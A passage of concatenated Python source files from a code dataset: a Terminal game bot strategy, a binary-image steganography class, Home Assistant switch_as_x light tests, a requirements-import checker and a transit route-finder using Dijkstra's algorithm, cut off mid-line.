self.prev_enemy_cores = game_state.get_resource(game_state.CORES, 1)\n self.prev_current_health = game_state.my_health\n self.prev_enemy_health = game_state.enemy_health\n self.prev_health = game_state.enemy_health\n self.prev_all_locations = [[]]\n\n def build_defences(self, game_state):\n\n current_health = game_state.my_health\n '''\n First lets protect ourselves a little with destructors:\n '''\n firewall_locations = [[0, 13], [27, 13]]\n game_state.attempt_spawn(DESTRUCTOR, firewall_locations)\n\n '''\n Then lets boost our offense by building some encryptors to shield\n our information units. 
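on_game_start copies six shorthand codes out of config["unitInformation"] into globals one assignment at a time. An illustrative alternative (not the starter kit's API) keeps them in a single lookup table, assuming the config structure shown:

```python
def unit_shorthands(config):
    """Readable unit names -> engine shorthand codes, from the match config."""
    names = ["FILTER", "ENCRYPTOR", "DESTRUCTOR", "PING", "EMP", "SCRAMBLER"]
    return {name: config["unitInformation"][i]["shorthand"]
            for i, name in enumerate(names)}
```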
Lets put them near the front because the\n shields decay over time, so shields closer to the action\n are more effective.\n '''\n firewall_locations = [[3, 11], [4, 11], [5, 11]]\n game_state.attempt_spawn(ENCRYPTOR, firewall_locations)\n\n '''\n Lastly lets build encryptors in random locations. Normally building\n randomly is a bad idea but we'll leave it to you to figure out better\n strategies.\n\n First we get all locations on the bottom half of the map\n that are in the arena bounds.\n '''\n all_locations = []\n for i in range(game_state.ARENA_SIZE):\n for j in range(math.floor(game_state.ARENA_SIZE / 2)):\n if (game_state.game_map.in_arena_bounds([i, j])):\n all_locations.append([i, j])\n\n '''\n Then we remove locations already occupied.\n '''\n possible_locations = self.filter_blocked_locations(all_locations, game_state)\n\n destroyed_locations_x = []\n destroyed_locations = [[]]\n\n if ((self.prev_current_health - current_health) > 0):\n if (len(self.prev_all_locations)>0):\n if (len(possible_locations) > len(self.prev_all_locations)):\n # if there are more available locations then there were\n for x in possible_locations:\n if x not in self.prev_all_locations:\n destroyed_locations_x.append(x[0])\n destroyed_locations.append(x)\n\n\n if statistics.stdev(destroyed_locations_x) < 4:\n game_state.attempt_spawn(DESTRUCTOR, destroyed_locations_x[0])\n else:\n for x in destroyed_locations:\n game_state.attempt_spawn(FILTER, x)\n\n\n '''\n While we have cores to spend, build a random Encryptor.\n '''\n while game_state.get_resource(game_state.CORES) >= game_state.type_cost(ENCRYPTOR) and len(possible_locations) > 0:\n # Choose a random location.\n location_index = random.randint(0, len(possible_locations) - 1)\n build_location = possible_locations[location_index]\n '''\n Build it and remove the location since you can't place two\n firewalls in the same location.\n '''\n game_state.attempt_spawn(ENCRYPTOR, build_location)\n possible_locations.remove(build_location)\n\n self.prev_all_locations = possible_locations\n\n def deploy_attackers(self, game_state):\n\n\n starting_bits = game_state.get_resource(game_state.BITS)\n bits_to_spend = starting_bits\n enemy_bits = game_state.get_resource(game_state.BITS, 1)\n current_health = game_state.my_health\n enemy_health = game_state.enemy_health\n friendly_edges = game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_LEFT) + game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_RIGHT)\n deploy_locations = self.filter_blocked_locations(friendly_edges, game_state)\n\n #While we still want to spend more bits, deploy a random information unit\n while bits_to_spend >= 1 and len(deploy_locations) > 0:\n ping_value = 1\n scrambler_value = 1\n emp_value = 1\n\n #Stop if values were set below zero\n if ping_value + scrambler_value + emp_value < 1:\n break\n\n #Choose a random deploy location\n deploy_index = random.randint(0, len(deploy_locations) - 1)\n deploy_location = deploy_locations[deploy_index]\n\n #Adjust weights slightly based on game state\n if enemy_health <= 5:\n ping_value *= 2\n\n if enemy_bits > starting_bits or current_health <= 5:\n scrambler_value *= 2\n if bits_to_spend < 3:\n emp_value = 0\n\n deploy_location = [0,0]\n #Choose a random unit based on weights, higher weights are more likely to be chosen\n if ((self.prev_enemy_bits - enemy_bits) > enemy_bits*.3):\n unit_to_spawn = EMP\n deploy_location = deploy_locations[int(len(deploy_locations)/2)]\n bits_to_spend -= 3\n elif ((self.prev_enemy_health - 
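The destroyed-firewall logic above has two latent problems: statistics.stdev raises StatisticsError on fewer than two samples, and the clustered branch passes a bare x-coordinate to attempt_spawn where an [x, y] location is expected (destroyed_locations is also seeded with a spurious empty list). A guarded sketch of the same intent, reusing names from the file above:

```python
import statistics

def respond_to_destruction(game_state, destroyed_locations, DESTRUCTOR, FILTER):
    """Rebuild where firewalls were lost: clustered damage gets a destructor,
    scattered damage gets cheap filters."""
    destroyed = [loc for loc in destroyed_locations if loc]  # drop the seed empty list
    xs = [loc[0] for loc in destroyed]
    if len(xs) >= 2 and statistics.stdev(xs) < 4:
        game_state.attempt_spawn(DESTRUCTOR, destroyed[0])  # spawn takes a location, not an x
    else:
        for loc in destroyed:
            game_state.attempt_spawn(FILTER, loc)
```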
enemy_health) > 0):\n deploy_location = self.prev_deploy_location\n unit_to_spawn = PING\n bits_to_spend -= 1\n elif ((self.prev_enemy_health - enemy_health) == 0 and game_state.turn_number > 2):\n deploy_location = self.prev_deploy_location\n unit_to_spawn = SCRAMBLER\n bits_to_spend -= 1\n else:\n deploy_index = random.randint(0, len(deploy_locations) - 1)\n deploy_location = deploy_locations[deploy_index]\n unit_to_spawn = PING\n bits_to_spend -= 1\n self.prev_deploy_location = deploy_location\n\n\n game_state.attempt_spawn(unit_to_spawn, deploy_location)\n\n self.prev_starting_bits = game_state.get_resource(game_state.BITS)\n self.prev_enemy_bits = game_state.get_resource(game_state.BITS, 1)\n self.prev_starting_cores = game_state.get_resource(game_state.CORES)\n self.prev_enemy_cores = game_state.get_resource(game_state.CORES, 1)\n self.prev_current_health = game_state.my_health\n self.prev_enemy_health = game_state.enemy_health\n self.prev_health = game_state.my_health\n\n\n def filter_blocked_locations(self, locations, game_state):\n filtered = []\n for location in locations:\n if not game_state.contains_stationary_unit(location):\n filtered.append(location)\n return filtered\n\nif __name__ == \"__main__\":\n algo = AlgoStrategy()\n algo.start()\n","sub_path":"script1/algo_strategy.py","file_name":"algo_strategy.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"458536680","text":"import cv2\nimport numpy as np\nimport io\nimport math\n\nclass CPT:\n\n def convertImageToBinaryMatrix(self, path):\n np_img = self.convertImageToBinaryImage(path)\n return np.where(np_img == 255, 1, 0)\n\n def convertImageToBinaryImage(self, path):\n img = cv2.imread(path, 0)\n mat, bw = cv2.threshold(img, 127,255, cv2.THRESH_BINARY)\n return np.array(bw)#black and white\n\n def convertBinaryMatrixToBinaryImage(self, matrix):\n matrix = np.where(matrix == 1, 255, 0)\n return matrix\n\n def convertMatrixToImage(self, matrix, path):\n cv2.imwrite(path, matrix)\n\n def convertTextToBinary(self, s):\n st = ' '.join(format(ord(x), '08b') for x in s)\n return st\n\n def matrixMul(self, m1, m2):\n rs = []\n for i in range(len(m1)):\n ar = []\n for j in range(len(m1)):\n if m1[i][j] == 0:\n ar.append(0)\n else:\n ar.append(m2[i][j])\n rs.append(ar)\n return rs\n\n def maxTrixChangeBit(self, m, pos):\n m = np.array(m)\n for i in range(len(pos)):\n x = pos[i][0]\n y = pos[i][1]\n\n val = 0\n if m[x][y] == 0:\n val = 1\n m[x][y] = val\n\n return np.matrix(m)\n\n def encode(self, f, k, w, bit):\n t = np.array(np.bitwise_xor(f, k))\n #convert matrix to array\n f = np.array(f)\n k = np.array(k)\n #sum * w\n s = self.matrixMul(t, w)\n\n #sum s\n su = np.sum(s)\n\n #get d\n d = (int(bit, 2) - su) % pow(2, len(bit))\n posBitwise = []\n r = len(bit)\n\n if d != 0:\n jk = self.calcS(w,t,d,r)\n if jk is not None:\n posBitwise.append(jk)\n else:\n #tim so tu nhien h in {1,2,3,..2r-1} nho nhat sao cho Shd != null va Sd-hd != null\n for h in range(1,pow(2,r) - 1):\n jk = self.calcS(w,t,h,r)\n if jk is not None:\n h2 = pow(2,r) + (d-h)\n uv = self.calcS(w,t,h2,r)\n if uv is not None:\n posBitwise.append(jk)\n posBitwise.append(uv)\n break\n\n return self.maxTrixChangeBit(f,posBitwise)\n\n def calcS(self, w, t, d, r):\n for i in range(len(t)):\n if d in w[i]:\n pos = w[i].index(d)\n if t[i][pos] == 0:\n return [i, pos]\n elif (pow(2, r) - d) in w[i]:\n pos = w[i].index((pow(2, r) - d))\n if t[i][pos] == 1:\n return [i, pos]\n 
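convertImageToBinaryMatrix thresholds at 127 and maps 255 to 1, and convertBinaryMatrixToBinaryImage inverts that; the numpy core of the round trip in a few runnable lines:

```python
import numpy as np

bw = np.array([[0, 255], [255, 0]])      # 0/255 binary image
bits = np.where(bw == 255, 1, 0)         # forward: 255 -> 1
restored = np.where(bits == 1, 255, 0)   # inverse: 1 -> 255
assert (restored == bw).all()
```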
return None\n\n def decode(self, f, k, w, r):\n\n t = np.array(np.bitwise_xor(f, k))\n # convert matrix to array\n f = np.array(f)\n k = np.array(k)\n w = np.array(w)\n\n # sum\n t = np.array(t)\n\n # sum * w\n s = self.matrixMul(t, w)\n\n # sum s\n su = np.sum(s)\n\n # print(su % (pow(2,)))\n result = (su % (pow(2, r)))\n return format(result, '08b')\n\n def runEncode(self, pathImg, pathText ):\n fo = io.open(pathText, \"r\", encoding=\"utf8\")\n text = fo.read()\n fo.close()\n\n f_matrix = self.convertImageToBinaryMatrix(pathImg)\n ele = 16\n\n if text == \"\":\n return self.convertBinaryMatrixToBinaryImage(f_matrix)\n else:\n dh = f_matrix.shape[0] - (f_matrix.shape[0] % 16) #height\n dw = f_matrix.shape[1] - (f_matrix.shape[1] % 16) #width\n rest = int(((dh * dw) /(ele*ele)) - len(text) - len(codeToEndDecode))\n if(rest >= 0):\n text = text + codeToEndDecode\n else:\n rest = len(codeToEndDecode) + rest\n for i in range(0, rest):\n text = text + \" \"\n\n st = self.convertTextToBinary(text).split(\" \")\n\n x = 0\n y = 0\n i = 0\n\n max_size_h = f_matrix.shape[1]\n max_size_v = f_matrix.shape[0]\n\n\n sss = \"\"\n for bit in st:\n\n f = f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele]\n r = 8\n f = self.encode(f, k, w, bit)\n f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele] = np.matrix(f)\n f = f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele]\n x += 1\n\n if (x * ele + ele > max_size_h):\n y += 1\n x = 0\n\n if (y * ele + ele > max_size_v):\n break\n return self.convertBinaryMatrixToBinaryImage(f_matrix)\n\n def runDecode(self, pathImg):\n f_matrix = self.convertImageToBinaryMatrix(pathImg)\n x = 0\n y = 0\n i = 0\n ele = 16\n max_size_h = f_matrix.shape[1]\n max_size_v = f_matrix.shape[0]\n result = \"\"\n while 1==1:\n r = 8\n f = f_matrix[y * ele:y * ele + ele, x * ele: x * ele + ele]\n dc = self.decode(f, k, w, r)\n num = int(dc, 2)\n result += chr(num)\n x += 1\n if (x * ele + ele > max_size_h):\n y += 1\n x = 0\n\n if y * ele + ele > max_size_v:\n break\n\n if codeToEndDecode in result:\n result = result[:-len(codeToEndDecode)]\n break\n\n return result\n\n def calcPSNR(self, img1, img2):\n\n original = cv2.imread(img1)\n compressed = cv2.imread(img2)\n\n mse = np.mean((original - compressed) ** 2)\n\n if (mse == 0): # MSE is zero means no noise is present in the signal .\n # Therefore PSNR have no importance.\n return 100\n\n max_pixel = 255\n psnr = 20 * math.log10(max_pixel / math.sqrt(mse))\n return psnr\n\n\nk = np.matrix([[1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1], #1\n [1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0], #2\n [0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1], #3\n [1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0], #4\n [1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0], #5\n [0, 1, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1], #6\n [1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0], #7\n [1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0], #8\n [0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1], #9\n [1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 0], #10\n [0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 1, 1, 1], #11\n [0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1], #12\n [1, 0, 1, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1], #13\n [1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1], #14\n [1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1], #15\n [1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0]]) #16\n\nw = [[208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223], #1\n [8, 1, 2, 3, 4, 5, 6, 7, 1, 9, 10, 11, 12, 13, 14, 15], #2\n [32, 33, 34, 35, 36, 37, 
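calcPSNR computes `(original - compressed) ** 2` directly on the uint8 arrays OpenCV returns, where subtraction wraps around modulo 256 and silently skews the MSE. A version that casts to float first, same formula otherwise:

```python
import math
import numpy as np

def psnr(a, b, max_pixel=255.0):
    """Peak signal-to-noise ratio; cast to float so uint8 math cannot wrap."""
    mse = np.mean((a.astype(np.float64) - b.astype(np.float64)) ** 2)
    if mse == 0:
        return float('inf')  # identical images: no noise
    return 20 * math.log10(max_pixel / math.sqrt(mse))
```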
38, 39, 40, 41, 42, 43, 44, 45, 46, 47], #3\n [144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159], #4\n [240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255], #5\n [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63], #6\n [80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95], #7\n [192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207], #8\n [96, 97, 98, 99, 100, 101, 102, 103, 104, 1, 106, 107, 108, 109, 110, 111], #9\n [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143], #10\n [16, 17, 18, 19, 20, 1, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31], #11\n [160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175], #12\n [64, 65, 66, 67, 68, 69, 70, 71, 72, 1, 74, 75, 76, 77, 78, 79], #13\n [176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191], #14\n [224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239], #15\n [112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 1, 126, 127]] #16\n\ncodeToEndDecode = \"HTW\"\n\n\n#cpt = CPT()\n# img = cpt.runEncode(\"./img/demo.jpg\",\"input.txt\")\n# cpt.convertMatrixToImage(img,\"./output/test.jpg\")\n# text = cpt.runDecode(\"./output/test.jpg\")\n# file = open(\"./output/test.txt\",\"w\")\n# file.write(text)\n# file.close()\n# cpt = Cpt()\n# print(cpt.calcPSNR(\"./test3/1.jpg\", \"./test3_rs/1.bmp\"))\n# print(cpt.calcPSNR(\"./test3/2.jpg\", \"./test3_rs/2.bmp\"))\n# print(cpt.calcPSNR(\"./test3/3.jpg\", \"./test3_rs/3.bmp\"))\n# print(cpt.calcPSNR(\"./test3/4.jpg\", \"./test3_rs/4.bmp\"))\n","sub_path":"venv/Include/CPT.py","file_name":"CPT.py","file_ext":"py","file_size_in_byte":9027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"104060804","text":"import random\n\ndef hello():\n print(\"Hello!\")\n print(\" chengjing!\")\nhello()\nhello()\n\n\ndef hello(name):\n print(\"hello! 
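The commented-out driver at the bottom of CPT.py shows the intended round trip. One caveat when reviving it: the payload lives in pixel values, so the stego image must be written in a lossless format (the module's own PSNR tests read .bmp files); JPEG recompression would destroy the embedded bits. A sketch using the class above, with placeholder paths:

```python
cpt = CPT()
stego = cpt.runEncode('./img/demo.jpg', 'input.txt')    # embed the text file's bits
cpt.convertMatrixToImage(stego, './output/stego.bmp')   # lossless format, or the payload is lost
print(cpt.runDecode('./output/stego.bmp'))
```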
\"+name)\nhello('chengjing')\n\n\n\ndef getAnswer(answerNumber):\n if answerNumber == 1:\n return 'It\\' is certain'\n elif answerNumber == 2:\n return 'hi'\nr = random.randint(1,9)\nfortune = getAnswer(r)\nprint(fortune)\n\nprint('Hello',end='')\nprint('World')\n","sub_path":"little demos/test6(helloFunc).py","file_name":"test6(helloFunc).py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"126951477","text":"\"\"\"Tests for the Switch as X Light platform.\"\"\"\nimport pytest\n\nfrom homeassistant.components.light import (\n ATTR_COLOR_MODE,\n ATTR_SUPPORTED_COLOR_MODES,\n COLOR_MODE_ONOFF,\n)\nfrom homeassistant.components.switch_as_x import DOMAIN\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import device_registry as dr, entity_registry as er\nfrom homeassistant.setup import async_setup_component\n\nfrom tests.common import MockConfigEntry\nfrom tests.components.light import common\nfrom tests.components.switch import common as switch_common\n\n\nasync def test_default_state(hass):\n \"\"\"Test light switch default state.\"\"\"\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.test\", \"target_domain\": \"light\"},\n title=\"Christmas Tree Lights\",\n )\n config_entry.add_to_hass(hass)\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n state = hass.states.get(\"light.christmas_tree_lights\")\n assert state is not None\n assert state.state == \"unavailable\"\n assert state.attributes[\"supported_features\"] == 0\n assert state.attributes.get(\"brightness\") is None\n assert state.attributes.get(\"hs_color\") is None\n assert state.attributes.get(\"color_temp\") is None\n assert state.attributes.get(\"white_value\") is None\n assert state.attributes.get(\"effect_list\") is None\n assert state.attributes.get(\"effect\") is None\n assert state.attributes.get(ATTR_SUPPORTED_COLOR_MODES) == [COLOR_MODE_ONOFF]\n assert state.attributes.get(ATTR_COLOR_MODE) is None\n\n\nasync def test_light_service_calls(hass):\n \"\"\"Test service calls to light.\"\"\"\n await async_setup_component(hass, \"switch\", {\"switch\": [{\"platform\": \"demo\"}]})\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.decorative_lights\", \"target_domain\": \"light\"},\n title=\"decorative_lights\",\n )\n config_entry.add_to_hass(hass)\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n\n await common.async_toggle(hass, \"light.decorative_lights\")\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"off\"\n assert hass.states.get(\"light.decorative_lights\").state == \"off\"\n\n await common.async_turn_on(hass, \"light.decorative_lights\")\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"on\"\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n assert (\n hass.states.get(\"light.decorative_lights\").attributes.get(ATTR_COLOR_MODE)\n == COLOR_MODE_ONOFF\n )\n\n await common.async_turn_off(hass, \"light.decorative_lights\")\n await hass.async_block_till_done()\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"off\"\n assert hass.states.get(\"light.decorative_lights\").state == \"off\"\n\n\nasync def test_switch_service_calls(hass):\n \"\"\"Test service 
calls to switch.\"\"\"\n await async_setup_component(hass, \"switch\", {\"switch\": [{\"platform\": \"demo\"}]})\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.decorative_lights\", \"target_domain\": \"light\"},\n title=\"decorative_lights\",\n )\n config_entry.add_to_hass(hass)\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n\n await switch_common.async_turn_off(hass, \"switch.decorative_lights\")\n await hass.async_block_till_done()\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"off\"\n assert hass.states.get(\"light.decorative_lights\").state == \"off\"\n\n await switch_common.async_turn_on(hass, \"switch.decorative_lights\")\n await hass.async_block_till_done()\n\n assert hass.states.get(\"switch.decorative_lights\").state == \"on\"\n assert hass.states.get(\"light.decorative_lights\").state == \"on\"\n\n\n@pytest.mark.parametrize(\"target_domain\", (\"light\",))\nasync def test_config_entry_entity_id(hass: HomeAssistant, target_domain):\n \"\"\"Test light switch setup from config entry with entity id.\"\"\"\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": \"switch.abc\", \"target_domain\": target_domain},\n title=\"ABC\",\n )\n\n config_entry.add_to_hass(hass)\n\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert DOMAIN in hass.config.components\n\n state = hass.states.get(f\"{target_domain}.abc\")\n assert state.state == \"unavailable\"\n # Name copied from config entry title\n assert state.name == \"ABC\"\n\n # Check the light is added to the entity registry\n registry = er.async_get(hass)\n entity_entry = registry.async_get(f\"{target_domain}.abc\")\n assert entity_entry.unique_id == config_entry.entry_id\n\n\n@pytest.mark.parametrize(\"target_domain\", (\"light\",))\nasync def test_config_entry_uuid(hass: HomeAssistant, target_domain):\n \"\"\"Test light switch setup from config entry with entity registry id.\"\"\"\n registry = er.async_get(hass)\n registry_entry = registry.async_get_or_create(\"switch\", \"test\", \"unique\")\n\n config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": registry_entry.id, \"target_domain\": target_domain},\n title=\"ABC\",\n )\n\n config_entry.add_to_hass(hass)\n\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n assert hass.states.get(f\"{target_domain}.abc\")\n\n\n@pytest.mark.parametrize(\"target_domain\", (\"light\",))\nasync def test_device(hass: HomeAssistant, target_domain):\n \"\"\"Test the entity is added to the wrapped entity's device.\"\"\"\n device_registry = dr.async_get(hass)\n entity_registry = er.async_get(hass)\n\n test_config_entry = MockConfigEntry()\n\n device_entry = device_registry.async_get_or_create(\n config_entry_id=test_config_entry.entry_id,\n connections={(dr.CONNECTION_NETWORK_MAC, \"12:34:56:AB:CD:EF\")},\n )\n switch_entity_entry = entity_registry.async_get_or_create(\n \"switch\", \"test\", \"unique\", device_id=device_entry.id\n )\n\n switch_as_x_config_entry = MockConfigEntry(\n data={},\n domain=DOMAIN,\n options={\"entity_id\": switch_entity_entry.id, \"target_domain\": target_domain},\n title=\"ABC\",\n )\n\n switch_as_x_config_entry.add_to_hass(hass)\n\n assert await 
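The light and switch service-call tests repeat the same MockConfigEntry setup verbatim; a pytest fixture could factor it out. A sketch only, assuming the async-fixture support Home Assistant's test harness provides and the helpers already imported above:

```python
import pytest

@pytest.fixture
async def switch_as_x_entry(hass):
    """Set up a switch_as_x entry wrapping switch.decorative_lights."""
    config_entry = MockConfigEntry(
        data={},
        domain=DOMAIN,
        options={"entity_id": "switch.decorative_lights", "target_domain": "light"},
        title="decorative_lights",
    )
    config_entry.add_to_hass(hass)
    assert await hass.config_entries.async_setup(config_entry.entry_id)
    await hass.async_block_till_done()
    return config_entry
```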
hass.config_entries.async_setup(switch_as_x_config_entry.entry_id)\n await hass.async_block_till_done()\n\n entity_entry = entity_registry.async_get(f\"{target_domain}.abc\")\n assert entity_entry.device_id == switch_entity_entry.device_id\n","sub_path":"tests/components/switch_as_x/test_light.py","file_name":"test_light.py","file_ext":"py","file_size_in_byte":6867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290292747","text":"import importlib\n\nreqs = []\nwith open('../requirements.txt') as f:\n reqs = f.read().split('\\n')\n\n\nreqs = [m.split('==')[0] for m in reqs if m]\n\nfor module in reqs:\n try:\n importlib.import_module(module)\n except ModuleNotFoundError as e:\n print('not found:', module)\nprint(reqs)\n","sub_path":"honeybot/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"155567835","text":"import settings\nimport pandas as pd\nfrom math import radians, sin, cos, asin, sqrt\nimport json\nimport heapq\n\n\ndef Initialize():\n # Load services, stops, routes\n settings.stops = json.loads(open(\"data/stops.json\").read())\n settings.bus_routes = json.loads(open(\"data/bus_routes.json\").read())\n settings.train_routes = json.loads(open(\"data/train_routes.json\").read())\n\n # Load house and bus_stops nodes\n settings.houses_pd = pd.read_excel(\"data/coordinates.xlsx\")\n settings.stops_pd = pd.read_excel(\"data/stops.xlsx\")\n settings.stations_pd = pd.read_csv(\"data/stations.csv\")\n\n # Initialize BusStopCode, Description\n settings.stops_code_map = {stop['BusStopCode']: stop for stop in settings.stops}\n settings.stops_desc_map = {stop[\"Description\"]: stop for stop in settings.stops}\n\n # Initialize the route_map dictionary\n # route_map = { (service, direction, type) : [route] }\n for route in settings.bus_routes:\n key = (route[\"ServiceNo\"], route[\"Direction\"], \"Bus\")\n if key not in settings.routes_map:\n settings.routes_map[key] = []\n settings.routes_map[key] += [route]\n\n for route in settings.train_routes:\n key = (route[\"ServiceName\"], route[\"Direction\"], \"Train\")\n if key not in settings.routes_map:\n settings.routes_map[key] = []\n settings.routes_map[key] += [route]\n\n # Initialize the graph\n # graph = { node : { (adj_node, (service, direction, type)) : distance } }\n for service, route in settings.routes_map.items():\n if service[-1] == \"Bus\":\n key_name = \"BusStopCode\"\n else:\n key_name = \"StationName\"\n for route_index in range(len(route) - 1):\n key = route[route_index][key_name]\n if key not in settings.graph:\n settings.graph[key] = {}\n if None in {route[route_index][\"Distance\"], route[route_index + 1][\"Distance\"]}:\n distance = 0\n else:\n distance = route[route_index + 1][\"Distance\"] - route[route_index][\"Distance\"]\n settings.graph[key][(route[route_index + 1][key_name], service)] = distance\n\n for index, station in settings.stations_pd.iterrows():\n nearest_nodes = nodes_within_dist(station, settings.max_walking_dist)\n for node in nearest_nodes:\n nearest, dist, key_name = node\n settings.graph[station[\"Description\"]][(str(nearest[key_name]), (\"\", 0, \"Walk\"))] = dist\n\n # For the dropdown list\n settings.drop_station = settings.stations_pd[\"Description\"].to_numpy().tolist()\n settings.drop_house = settings.houses_pd[\"blk_no\"].to_numpy().tolist()\n settings.list_options = [\"Shortest Route\", \"Least Transfers\", \"Prefer 
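lab.py assumes each requirement's PyPI name is also its import name, which fails for packages like Pillow (imported as PIL). A mapping-aware sketch of the same check; the mapping entries are illustrative, not exhaustive:

```python
import importlib

# PyPI name -> import name, for packages where the two differ (extend as needed)
IMPORT_NAMES = {'Pillow': 'PIL', 'beautifulsoup4': 'bs4', 'PyYAML': 'yaml'}

def check_requirements(path='requirements.txt'):
    """Report requirements that cannot be imported under their expected name."""
    with open(path) as f:
        names = [line.split('==')[0] for line in f.read().split('\n') if line]
    for name in names:
        try:
            importlib.import_module(IMPORT_NAMES.get(name, name))
        except ModuleNotFoundError:
            print('not found:', name)
```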
Bus\", \"Prefer Train\"]\n\n\ndef distNodes(lon1, lat1, lon2, lat2):\n \"\"\"\n Calculate the great circle distance between two points on the earth (specified in decimal degrees)\n \"\"\"\n # convert decimal degrees to radians\n lon1 = radians(lon1)\n lat1 = radians(lat1)\n lon2 = radians(lon2)\n lat2 = radians(lat2)\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n # Radius of earth in kilometers is 6371\n km = 6371 * c\n return km\n\n\ndef nodes_within_dist(loc, radius):\n \"\"\"\n Return all nodes that are in the radius of given location\n \"\"\"\n lat = float(loc['latitude'])\n lon = float(loc['longitude'])\n nodes = []\n for index, stop in settings.stops_pd.iterrows():\n lat2 = float(stop['latitude'])\n lon2 = float(stop['longitude'])\n dist = distNodes(lon, lat, lon2, lat2)\n if radius > dist > 0:\n nodes.append((stop, dist, \"BusStopCode\"))\n for index, station in settings.stations_pd.iterrows():\n lat2 = float(station['latitude'])\n lon2 = float(station['longitude'])\n dist = distNodes(lon, lat, lon2, lat2)\n if radius > dist > 0:\n nodes.append((station, dist, \"Description\"))\n return nodes\n\n\ndef dijkstra(graph, start, end):\n \"\"\"\n Calculates the shortest path between two points\n \"\"\"\n # priority queue to store the paths\n heap = []\n # seen set to prevent checking the same node twice\n seen = set()\n # push the first item into the priority queue. item is a tuple: (cost, distance, path)\n heapq.heappush(heap, (0, 0, [(start, None, 0)]))\n while heap:\n # get the item with the least cost from the queue\n curr_cost, curr_dist, path = heapq.heappop(heap)\n # get the last node of the path\n node, curr_service, _ = path[-1]\n # if path is found, return the path\n if node == end:\n return curr_dist, path\n # if node has been already checked, skip\n if (node, curr_service) in seen:\n continue\n # add node to the seen set\n seen.add((node, curr_service))\n\n # iterate through all adjacent nodes\n for (adjacent, service), dist in graph.get(node, {}).items():\n # construct a new path with the adjacent node\n new_path = list(path)\n new_path.append((adjacent, service, dist))\n\n # calculate the cost of going to the adjacent node\n new_cost = curr_cost\n if curr_service and curr_service[-1] != 'Walk' and curr_service != service:\n new_cost += settings.transfer_cost\n if service[-1] == \"Bus\":\n new_cost += 